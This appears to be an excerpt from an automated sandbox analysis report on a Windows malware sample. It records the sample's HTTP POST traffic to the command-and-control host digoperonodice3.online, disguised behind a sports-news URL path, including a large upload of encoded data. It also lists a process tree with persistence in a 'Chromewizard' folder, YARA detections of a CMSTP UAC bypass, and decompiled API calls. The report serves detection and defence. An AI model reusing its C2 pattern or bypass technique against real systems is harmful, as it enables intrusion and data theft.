2024-12-27 07:16:12 UTC	484	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 380 Host: digoperonodice3.online
2024-12-27 07:16:12 UTC	380	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 02 26 77 35 95 00 00 00 28 00 00 00 04 04 04 04 06 22 73 31 07 04 04 04 04 04 04 04 96 c4 94 04 04 04 04 06 22 73 31 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 04 29 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 04 54 4f 02 03 04 04 04 04 04 04 04 04 04 04 04 04 05 04 04 04 54 4f 01 02 04 04 04 04 fb fb fb fb fb fb fb fb fb fb fb fb 04 04 fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb a0 1b 48 24 9c ee 94 49 08 00 00 00 b2 7c 2b 2e 94 00 00 00 28 00 00 00 04 04 04 04 b6 78 2f 2a 06 04 04 04 04 04 04 04 95 94 04 04 04 04 b6 78 2f 2a 66 04 04 04 04 04 04 04 54 4f 02 02 28 04 04 04 04 04 04 04 29 Data Ascii: &w5("s1"s1fTO())TOTOH$I\|+.(x/x/fTO()
2024-12-27 07:16:13 UTC	864	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:13 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ihR3Tzf%2BdAAtANyjrEWl2t2oBBZzs3q3Dg%2BiLC4hkDPV%2FKu2XKD5L8jg3TjqkRcKoh2EhA%2FjsOPcaN%2FpAsE%2FY%2BIHcQvDcho%2B5DmWgO0exhtqJtcTNEunHih7Gke0RSRGjxskLsNzAwxP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f87861dad1f8c7d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1810&min_rtt=1807&rtt_var=684&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1500&delivery_rate=1592148&cwnd=239&unsent_bytes=0&cid=3b16638d5ca579c1&ts=648&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.8	49720	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:14 UTC	483	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 35 Host: digoperonodice3.online
2024-12-27 07:16:14 UTC	35	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-12-27 07:16:15 UTC	858	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:15 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b%2Fugh3Brd2rUKhN0Is%2Fa8m94ipTnHFvVjiy9u%2FgOIyDZfTbu3UJmQ6wBz0OfzjphuidvXL%2FErTAcVkmwM2wmXEt9VZyDmc4hsFMMIGVYz3elOuzvsdKRD9bhpIg%2FufmofsS8f6GB2Van"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8786299d502363-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1816&min_rtt=1812&rtt_var=688&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2857&recv_bytes=1154&delivery_rate=1580942&cwnd=252&unsent_bytes=0&cid=d458431c09926370&ts=614&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.8	49721	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:17 UTC	486	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 75155 Host: digoperonodice3.online
2024-12-27 07:16:17 UTC	15331	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 01 08 00 00 00 66 da 95 30 58 25 01 00 28 00 00 00 04 04 04 04 62 de 91 34 93 0b 04 04 04 04 04 04 9f c4 a2 32 33 31 34 31 36 a2 6c 71 66 61 76 70 97 0e 04 c9 4e 61 95 96 c9 01 04 c9 00 04 cb 04 04 04 05 fb f0 04 04 dd 22 4d 6a 70 61 68 2c 56 2d 24 47 6b 76 61 2c 50 49 2d 36 24 47 54 51 24 32 32 34 34 24 44 24 36 2a 30 34 24 43 4c 7e 95 bb 49 6d 67 76 6b 77 6b 62 70 24 46 65 77 6d 67 24 40 6d 77 74 68 65 7d 24 45 60 65 74 70 61 76 c4 c7 d8 04 cc a4 a2 57 7d 77 70 61 69 ac 56 61 63 6d 77 70 76 7d ac 77 69 77 77 2a 61 7c 61 ad 67 77 76 77 77 2a 61 7c 61 af 73 6d 6a 6d 6a 6d 70 2a 61 7c 61 ad 67 77 76 77 77 2a 61 7c 61 a8 73 6d 6a 68 6b 63 6b 6a 2a 61 7c 61 a8 77 61 76 72 6d 67 61 77 2a 61 7c 61 ad 68 77 Data Ascii: f0X%(b4231416lqfavpNa"Mjpah,V-$Gkva,PI-6$GTQ$2244$D$604$CL~Imgvkwkbp$Fewmg$@mwthe}$E`etpavW}wpaiVacmwpv}wiwwa\|agwvwwa\|asmjmjmpa\|agwvwwa\|asmjhkckja\|awavrmgaw*a\|ahw
2024-12-27 07:16:17 UTC	15331	OUT	Data Raw: 30 d1 06 48 64 60 b4 f2 17 5a 76 66 24 84 24 0c cd d5 89 86 87 c8 11 a5 d4 ea 50 d6 4b 4d 4d 71 54 93 4a 79 46 36 9a 19 d2 6d 80 d4 fd 5c 22 7d 02 ae cc c4 7a 98 e6 3d 15 42 b9 0d a5 55 47 8d 61 6e f5 7c aa c7 50 8f 1c 35 14 b3 a3 1a 18 4e 9a d1 e5 e8 89 c3 ff 2d 9e 98 7e f4 24 7a 1d ee 81 5c 01 17 9d 17 56 80 22 1c 14 a6 2d 19 ec 09 79 10 04 16 85 cf 85 bc 39 74 43 14 d0 88 7f 59 5a 89 28 b8 f1 b5 b1 7f 85 f2 5a b7 82 05 ef 40 23 15 48 17 12 83 30 ba bd 0f 65 d6 e2 f9 1e 5f 8e 4a 67 3b 2b e0 4b 9a 37 d1 5e 89 4c e1 d0 11 2d f1 25 ea a4 c5 dd 67 50 da a2 88 84 d8 2a 52 85 d1 42 8a 91 e9 ca 30 f1 24 49 08 dc b3 dd 42 4b fb b2 e2 30 46 84 cc ae ad 82 72 4e cd 5b cf 15 ee 54 50 13 30 72 2a 3f 07 fd a4 bd 41 70 be 2d 81 43 db c5 46 84 01 c0 6b 98 88 d9 be 6c Data Ascii: 0Hd`Zvf$$PKMMqTJyF6m\"}z=BUGan\|P5N-~$z\V"-y9tCYZ(Z@#H0e_Jg;+K7^L-%gPRB0$IBK0FrN[TP0r?Ap-CFkl
2024-12-27 07:16:17 UTC	15331	OUT	Data Raw: 1b 6f 5f c8 90 d0 5b 79 71 91 29 b4 fc 59 65 9d 64 39 60 58 a5 8f 1e 2b 7b 6f f9 d0 9d 47 56 0f 37 18 a5 d6 6a 9e be d2 ea 26 67 75 cd f2 45 f3 ce 4f 50 ea 16 e3 61 a8 45 7a ff 58 a2 78 cf ca 71 2b d3 a7 f9 87 87 0c 7a 86 6a ab ae 84 7c d7 a0 1b 40 e3 ef ab f4 87 b7 e9 46 c9 fd aa cd 6b 79 d4 53 3b f1 cd 67 a0 4e a5 2b 25 3c 9d 1f 80 f6 bf e6 73 b2 2a 02 7e 71 61 8d 0b 74 1b dd 76 fc ea 8b b2 bd 3c 23 f3 fa 37 01 45 3e f9 58 ec dc 76 ef ef 48 e6 5a 99 ba de 5e 9f e8 80 d5 c4 c2 15 68 9b 96 71 cf bd 13 bd 99 9b 1a b3 5c a7 e5 cf 65 33 32 0e ca 5a ab e6 36 d7 e4 5a 1e ef ca 3e c7 0d bb 5e 59 56 69 d2 b8 f9 3f 8c 49 22 e4 fa 24 e1 c8 a1 a6 49 3e 94 b6 e2 da 92 7b 42 4a b8 eb 81 4b e5 68 ea 0b b1 b2 3f cf b2 ab e7 cf 3b 1b d1 74 eb 5c fa e4 eb f8 b6 5d 44 07 Data Ascii: o_[yq)Yed9`X+{oGV7j&guEOPaEzXxq+zj\|@FkyS;gN+%<s*~qatv<#7E>XvHZ^hq\e32Z6Z>^YVi?I"$I>{BJKh?;t\]D
2024-12-27 07:16:17 UTC	15331	OUT	Data Raw: 48 68 06 42 ff 2e 4f e8 e6 3b f8 de bf 63 d6 75 92 51 b4 ac 75 28 81 4f 57 e6 57 30 4a 68 d7 8e 67 ed 74 d4 07 f3 17 be 83 80 b4 b9 36 c1 02 62 8e eb 93 72 6b f7 8a de ff 0e 59 9e ed 42 49 a9 69 bd d2 2e c9 cc 9c 43 9b 18 ba b8 41 03 3a 8e 70 2d 3b e7 e2 2f f1 4c 95 88 40 23 57 51 72 ef e7 b5 19 f2 89 73 c2 8b 4c b7 76 d7 92 83 2a 8e a2 07 b6 ad b9 6f b6 42 45 f2 73 2d eb bf 98 78 03 0c ed 09 ec fa ce 29 07 ef 6a 43 58 8d f9 9e f7 c3 90 f1 0e 9f 83 55 38 e7 0b bb 98 96 2c 7e 5b 21 3d cf f0 e0 6f 17 c4 40 ef ff 31 f0 4a 1e 75 c3 ff 0e 89 87 98 73 e2 1a 72 37 ef 82 ec 72 dd 32 93 7b a4 25 19 ec 95 da 25 61 3e 3c 34 b6 1a 17 91 75 27 9b 7f 6c 4a 2c 27 3c e2 be 20 0c d1 fb 4b 55 d1 bb f9 4b 1c 65 15 be 87 1d 61 f4 03 f9 47 73 ea 63 29 1c a6 e6 fb 74 9d 1c c6 Data Ascii: HhB.O;cuQu(OWW0Jhgt6brkYBIi.CA:p-;/L@#WQrsLv*oBEs-x)jCXU8,~[!=o@1Jusr7r2{%%a><4u'lJ,'< KUKeaGsc)t
2024-12-27 07:16:17 UTC	13831	OUT	Data Raw: 95 09 32 80 94 f4 bb 31 12 4d 7c 0c 4f 7b 6d e9 12 ef 11 58 db 3f d8 f2 85 e3 6e dd fc 56 c9 57 9a 56 1f 2c b8 ae c5 21 f7 af 95 d9 14 8d e4 77 4b 8e 58 2f f8 86 81 3e 7b c7 22 02 f6 59 61 81 8a 6c 6b b4 73 52 d1 76 c3 b1 6f 12 00 b3 f9 ae 61 c5 2a b1 fc 19 cd 27 f8 f8 36 f9 fa 8e 69 d1 be 2c e1 7a 88 c8 15 2b 70 d6 8b 71 27 bb e4 20 cf 73 80 08 e3 1f ea 07 db 8b 3b 5f 96 7e 58 66 df 7a 37 6b 42 a5 41 e7 d1 dd 57 2e 14 c0 cd 5c 12 c4 e8 d3 a1 b6 39 b1 e1 19 97 a3 f7 2b 8e 26 17 66 4a fe 52 4e a2 b4 4c 8f 4e 6f ae 59 be e7 9e 62 5e 70 c9 d3 f9 24 26 16 d9 29 33 72 fd a6 e6 c7 bf db 12 c5 97 1d b8 2f d5 78 c3 89 7f 4f ca 6d 1b 76 4f ea 4b 3f e1 ae 88 3c 69 c5 3e a1 8f d2 11 c9 db 81 7a 79 18 bd 24 e2 ef b5 74 cd 5c a2 2d 6b fa bd 89 d9 8b e0 ec 91 b3 94 32 Data Ascii: 21M\|O{mX?nVWV,!wKX/>{"YalksRvoa*'6i,z+pq' s;_~Xfz7kBAW.\9+&fJRNLNoYb^p$&)3r/xOmvOK?<i>zy$t\-k2
2024-12-27 07:16:18 UTC	858	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:18 GMT Connection: close catid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AxtTq1Oh33H6nZB5os7uYGtWymPkwyZsGxeRj5O%2BT8LFHU3bTSvnQjHF3JpfDdHF4XM2tGMHxafonRoir7osVB8CMl3hWs6XmJnsuyQU%2FMEM8k%2FPDWXmckfoyU05Gldo4IChzijf2UNP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f878637f88ac32e-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1630&min_rtt=1624&rtt_var=622&sent=46&recv=79&lost=0&retrans=0&sent_bytes=2856&recv_bytes=76475&delivery_rate=1741204&cwnd=178&unsent_bytes=0&cid=832d3d67d08f0245&ts=1077&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.8	49722	172.67.153.243	443	1296	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:19 UTC	483	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 adid: rO5Y+EUy98dkDQAUjJms14xAhmhL3HQVKmbcoaLqpV+FFu74H0d040wUOfSczRW6TNdz/erz+HABl5pdD6urald8PEEHL4guo0JHVSHByrpMe1E Content-Length: 35 Host: digoperonodice3.online
2024-12-27 07:16:19 UTC	35	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-12-27 07:16:20 UTC	749	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:20 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RZU%2BZow7yyiRJKbDR6YOuzSrp%2FgoKy7c85qb4S1L2oU2%2Frjf5Zm2Lck%2F%2BGqge4R1hMRTphnVpH%2Fp5lAFHIF3c%2FbBUfxv%2F7mSbMd5302focynHIAEbx6uYIeYixYlHhyyhUJVTyRS2j%2Fz"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8786481bf64283-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=37291&min_rtt=2109&rtt_var=21754&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1154&delivery_rate=1384542&cwnd=242&unsent_bytes=0&cid=e3c2ebfc36d7d52a&ts=634&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.8	49723	172.67.153.243	443	4080	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 07:16:23 UTC	364	OUT	POST /Ohio-Valley-Conference-Men-s-Basketball-Report-Austin-Peay?sc5n4ipm7=lcmcOpFBi8PyChIb5mRmE82zQ23wlecObape6EMi2B4HdVs%2F4BdPS%2BwwpupKUH77VgV9UBrmg1FNg3icLH9COQ%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0 Content-Length: 96 Host: digoperonodice3.online
2024-12-27 07:16:23 UTC	96	OUT	Data Raw: 00 00 00 00 fd ff ff ff 03 00 00 00 00 00 00 00 92 00 00 00 00 00 00 fe ff ff ff 2d 00 00 00 00 00 00 00 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-12-27 07:16:24 UTC	734	IN	HTTP/1.1 204 No Content Date: Fri, 27 Dec 2024 07:16:24 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OcW%2BUBQAkosfmlOhMa0g5MSdwaUegreb1BXRBEbQ4nAO0O5Lsuvu5YUj1YRFTA2F9Lufr9U1ih%2BZaGrHVOtwpd2Wp%2FqYdbC61ZV8TMaODcjSltS3CKf2M1rpfsizBTvG6MnJtxMRLHk5"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f8786617a1542fd-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2373&min_rtt=2366&rtt_var=901&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2855&recv_bytes=1096&delivery_rate=1205615&cwnd=248&unsent_bytes=0&cid=619997cc6e7e9f42&ts=710&x=0"

Target ID:	0
Start time:	02:15:05
Start date:	27/12/2024
Path:	C:\Users\user\Desktop\9mauyKC3JW.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\9mauyKC3JW.exe"
Imagebase:	0x400000
File size:	9'118'184 bytes
MD5 hash:	AE130C89B7D8C4C9FD06422FAEB79FC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:15:08
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\hv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\hv.exe"
Imagebase:	0xe20000
File size:	9'094'368 bytes
MD5 hash:	480F8CF600F5509595B8418C6534CAF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:15:09
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
Imagebase:	0x1a0000
File size:	9'094'368 bytes
MD5 hash:	480F8CF600F5509595B8418C6534CAF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:15:11
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1776755377.0000000005769000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	02:15:11
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	02:15:36
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	02:15:37
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
Imagebase:	0x1a0000
File size:	9'094'368 bytes
MD5 hash:	480F8CF600F5509595B8418C6534CAF2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:15:39
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1869821197.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 1868, Parent PID: 3344

General

Target ID:	11
Start time:	02:15:39
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:15:50
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
Imagebase:	0x1a0000
File size:	9'094'368 bytes
MD5 hash:	480F8CF600F5509595B8418C6534CAF2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	02:15:50
Start date:	27/12/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\cmd.exe
Imagebase:	0xa40000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	02:15:51
Start date:	27/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6ee680000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	02:16:07
Start date:	27/12/2024
Path:	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
Imagebase:	0x140000000
File size:	2'364'728 bytes
MD5 hash:	967F4470627F823F4D7981E511C9824F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	17.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	25.9%
Total number of Nodes:	1474
Total number of Limit Nodes:	20

Executed Functions

Function 00404FAA Relevance: 250.2, APIs: 103, Strings: 39, Instructions: 1671keyboardsynchronizationwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00401B37: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B43
Part of subcall function 00401B37: CreateWindowExW.USER32(00000000,Static,0041335C,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00401B60
Part of subcall function 00401B37: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00401B72
Part of subcall function 00401B37: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00401B7F
Part of subcall function 00401B37: DispatchMessageW.USER32(?), ref: 00401B89
Part of subcall function 00401B37: KillTimer.USER32(00000000,00000001,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B92
Part of subcall function 00401B37: KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,00404FBD,?,?,00000000), ref: 00401B99

GetVersionExW.KERNEL32(?,?,?,00000000), ref: 00404FCE
GetCommandLineW.KERNEL32(?,00000020,?,?,00000000), ref: 0040505C

Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402ADC
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?), ref: 00402AF7
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,00000000,00000000,00000020,?,?,?,?,?,?,?,?,0040507C), ref: 00402AFF
Part of subcall function 00402A69: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,00000020,?,?,?,?,?,?,?,?,0040507C,?,00000000), ref: 00402B6F

Part of subcall function 00403D71: lstrlenW.KERNEL32(?,00000000,00000020,?,0040508F,?,?,00000000,?,00000000), ref: 00403DA5
Part of subcall function 00403D71: lstrlenW.KERNEL32(?,?,00000000), ref: 00403DAD

_wtol.MSVCRT ref: 0040509F
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000000,004177C4,004177C4,?,00000000), ref: 004050F1
